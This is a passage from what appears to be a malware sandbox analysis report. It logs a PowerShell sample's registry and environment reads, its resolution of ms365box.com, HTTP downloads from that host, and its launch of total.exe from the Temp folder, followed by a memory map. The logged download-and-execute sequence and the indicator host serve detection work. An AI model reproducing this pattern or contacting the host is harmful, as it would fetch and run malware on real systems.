| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | System | - |
|
1 | |
| Open Key | System\PowerShell | - |
|
1 | |
| Open Key | Windows PowerShell | - |
|
1 | |
| Open Key | Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
6 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | - | value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Read Value | - | value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Read Value | - | value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | - | value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | - | value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | - | value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\ADU0VK~1\AppData\Local\Temp\total.exe | show_window = SW_SHOWNORMAL |
|
1 | |
| Get Info | - | type = PROCESS_BASIC_INFORMATION |
|
1 |
Module (5)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
2 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | |
| Map | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (7)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = AUFDDCNTXWT |
|
1 | |
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Mutex (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\.net clr networking |
|
5 | |
| Release | - |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
5 |
Environment (126)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
118 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\aDU0VK IWA5kLS |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\aDU0VK IWA5kLS |
|
1 | |
| Get Environment String | name = temp, result_out = C:\Users\ADU0VK~1\AppData\Local\Temp |
|
2 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\aDU0VK IWA5kLS\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
Network Behavior
DNS (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = ms365box.com, address_out = 31.202.128.249 |
|
1 |
HTTP Sessions (2)
| Information | Value |
|---|---|
| Total Data Sent | 111 bytes |
| Total Data Received | 805.37 KB |
| Contacted Host Count | 1 |
| Contacted Hosts | ms365box.com |
HTTP Session #1
| Information | Value |
|---|---|
| Server Name | ms365box.com |
| Server Port | 80 |
| Data Sent | 70 |
| Data Received | 479 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = ms365box.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /update.2 |
|
1 | |
| Send HTTP Request | headers = host: ms365box.com, connection: Keep-Alive, url = ms365box.com/update.2 |
|
1 | |
| Read Response | size = 4096, size_out = 479 |
|
1 |
HTTP Session #2
| Information | Value |
|---|---|
| Server Name | ms365box.com |
| Server Port | 80 |
| Data Sent | 41 |
| Data Received | 824217 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = ms365box.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /inv |
|
1 | |
| Send HTTP Request | headers = host: ms365box.com, url = ms365box.com/inv |
|
1 | |
| Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Read Response | size = 65536, size_out = 7584 |
|
1 | |
| Read Response | size = 65536, size_out = 23360 |
|
1 | |
| Read Response | size = 65536, size_out = 2920 |
|
1 | |
| Read Response | size = 65536, size_out = 23360 |
|
1 | |
| Read Response | size = 65536, size_out = 35040 |
|
1 | |
| Read Response | size = 65536, size_out = 54020 |
|
1 | |
| Read Response | size = 65536, size_out = 1460 |
|
1 | |
| Read Response | size = 65536, size_out = 14600 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 14764 |
|
1 | |
| Read Response | size = 65536, size_out = 16060 |
|
1 | |
| Read Response | size = 65536, size_out = 54020 |
|
1 | |
| Read Response | size = 65536, size_out = 16060 |
|
1 | |
| Read Response | size = 65536, size_out = 24820 |
|
1 | |
| Read Response | size = 65536, size_out = 26280 |
|
1 | |
| Read Response | size = 65536, size_out = 14600 |
|
1 | |
| Read Response | size = 65536, size_out = 8760 |
|
1 | |
| Read Response | size = 65536, size_out = 3472 |
|
1 | |
| Read Response | size = 65536, size_out = 50548 |
|
1 | |
| Read Response | size = 65536, size_out = 42340 |
|
1 | |
| Read Response | size = 65536, size_out = 54020 |
|
1 | |
| Read Response | size = 65536, size_out = 64240 |
|
1 | |
| Read Response | size = 65536, size_out = 35040 |
|
1 | |
| Read Response | size = 65536, size_out = 43800 |
|
1 | |
| Read Response | size = 65536, size_out = 52560 |
|
1 | |
| Read Response | size = 65536, size_out = 39420 |
|
1 | |
| Read Response | size = 31437, size_out = 24820 |
|
1 | |
| Read Response | size = 6617, size_out = 5840 |
|
1 | |
| Read Response | size = 777, size_out = 777 |
|
1 | |
| Close Session | - |
|
1 |
Process #4: total.exe
733
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\users\adu0vk~1\appdata\local\temp\total.exe |
| Command Line | "C:\Users\ADU0VK~1\AppData\Local\Temp\total.exe" |
| Initial Working Directory | C:\Users\aDU0VK IWA5kLS\Desktop\ |
| Monitor | Start Time: 00:02:22, Reason: Child Process |
| Unmonitor | End Time: 00:02:41, Reason: Self Terminated |
| Monitor Duration | 00:00:19 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x4c8 |
| Parent PID | 0xbf8 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | AUFDDCNTXWT\aDU0VK IWA5kLS |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
850
0x
818
0x
94
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| oleaccrc.dll | 0x001d0000 | 0x001d0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x001f1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x0027ffff | Private Memory | rw |
|
|
|
- |
| windowsshell.manifest | 0x00280000 | 0x00280fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000280000 | 0x00280000 | 0x00280fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00291fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.1.db | 0x002b0000 | 0x002b3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002b0fff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002c0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db | 0x003d0000 | 0x003ecfff | Memory Mapped File | r |
|
|
|
- |
| total.exe | 0x00400000 | 0x00439fff | Memory Mapped File | rwx |
|
|
|
- |
| locale.nls | 0x00440000 | 0x004a6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000004b0000 | 0x004b0000 | 0x00637fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000650000 | 0x00650000 | 0x0065ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000660000 | 0x00660000 | 0x007e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007f0000 | 0x007f0000 | 0x01beffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001bf0000 | 0x01bf0000 | 0x01c2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001c30000 | 0x01c30000 | 0x01c6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001c70000 | 0x01c70000 | 0x01c7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001c80000 | 0x01c80000 | 0x01dcffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001c80000 | 0x01c80000 | 0x01d5efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001d90000 | 0x01d90000 | 0x01dcffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001dd0000 | 0x01dd0000 | 0x021c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x021d0000 | 0x0249efff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000024a0000 | 0x024a0000 | 0x0259ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025a0000 | 0x025a0000 | 0x0269ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026a0000 | 0x026a0000 | 0x027a0fff | Private Memory | rw |
|
|
|
- |
| oleacc.dll | 0x74f90000 | 0x74fcbfff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x74fd0000 | 0x750c4fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x750d0000 | 0x7511bfff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x75120000 | 0x75136fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x75140000 | 0x751c3fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x75320000 | 0x754bdfff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x75520000 | 0x75532fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75540000 | 0x755bffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x755d0000 | 0x755d7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x755e0000 | 0x7563bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75640000 | 0x7567efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75680000 | 0x7568afff | Memory Mapped File | rwx |
|
|
|
- |
| userinfo.dll | 0x756f0000 | 0x756f4fff | Memory Mapped File | rwx |
|
|
|
- |
| nsexec.dll | 0x756f0000 | 0x756f4fff | Memory Mapped File | rwx |
|
|
|
- |
| userinfo.dll | 0x75700000 | 0x75704fff | Memory Mapped File | rwx |
|
|
|
- |
| nsexec.dll | 0x75700000 | 0x75704fff | Memory Mapped File | rwx |
|
|
|
- |
| system.dll | 0x75710000 | 0x75715fff | Memory Mapped File | rwx |
|
|
|
|
| ntmarta.dll | 0x75720000 | 0x75740fff | Memory Mapped File | rwx |
|
|
|
- |
| shfolder.dll | 0x75750000 | 0x75754fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x75760000 | 0x75768fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75880000 | 0x7588bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75890000 | 0x758effff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75920000 | 0x75976fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a55fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75a60000 | 0x75bbbfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75bc0000 | 0x75c6bfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75c70000 | 0x75c81fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75c90000 | 0x75d9ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75f20000 | 0x7600ffff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x76020000 | 0x76046fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76050000 | 0x7611bfff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x76130000 | 0x762ccfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76650000 | 0x766effff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76780000 | 0x7687ffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76880000 | 0x774c9fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x774d0000 | 0x7756cfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x77570000 | 0x775f2fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77600000 | 0x7768ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x77790000 | 0x777effff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x777f0000 | 0x77808fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x77810000 | 0x7789efff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x778a0000 | 0x778e4fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077930000 | 0x77930000 | 0x77a4efff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077a50000 | 0x77a50000 | 0x77b49fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77b50000 | 0x77cf8fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77d00000 | 0x77d09fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77d30000 | 0x77eaffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
